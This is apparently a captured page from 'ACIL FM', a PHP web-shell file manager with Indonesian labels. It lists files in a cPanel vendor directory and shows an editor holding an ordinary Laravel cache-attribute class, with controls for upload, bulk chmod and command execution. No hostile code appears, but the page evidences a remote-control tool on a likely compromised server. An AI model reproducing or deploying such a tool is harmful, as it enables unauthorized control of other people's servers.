ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/illuminate/container/Attributes
/
opt
cpanel
ea-wappspector
vendor
rector
rector
vendor
illuminate
container
Attributes
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Auth.php
929 B
chmod
View
DL
Edit
Rename
Delete
Authenticated.php
928 B
chmod
View
DL
Edit
Rename
Delete
Cache.php
887 B
chmod
View
DL
Edit
Rename
Delete
Config.php
1003 B
chmod
View
DL
Edit
Rename
Delete
CurrentUser.php
178 B
chmod
View
DL
Edit
Rename
Delete
Database.php
918 B
chmod
View
DL
Edit
Rename
Delete
DB.php
164 B
chmod
View
DL
Edit
Rename
Delete
Log.php
881 B
chmod
View
DL
Edit
Rename
Delete
RouteParameter.php
876 B
chmod
View
DL
Edit
Rename
Delete
Storage.php
894 B
chmod
View
DL
Edit
Rename
Delete
Tag.php
787 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/illuminate/container/Attributes/Cache.php
<?php namespace RectorPrefix202411\Illuminate\Container\Attributes; use Attribute; use RectorPrefix202411\Illuminate\Contracts\Container\Container; use RectorPrefix202411\Illuminate\Contracts\Container\ContextualAttribute; #[Attribute(Attribute::TARGET_PARAMETER)] class Cache implements ContextualAttribute { /** * @var string|null */ public $store; /** * Create a new class instance. */ public function __construct(?string $store = null) { $this->store = $store; } /** * Resolve the cache store. * * @param self $attribute * @param \Illuminate\Contracts\Container\Container $container * @return \Illuminate\Contracts\Cache\Repository */ public static function resolve(self $attribute, Container $container) { return $container->make('cache')->store($attribute->store); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply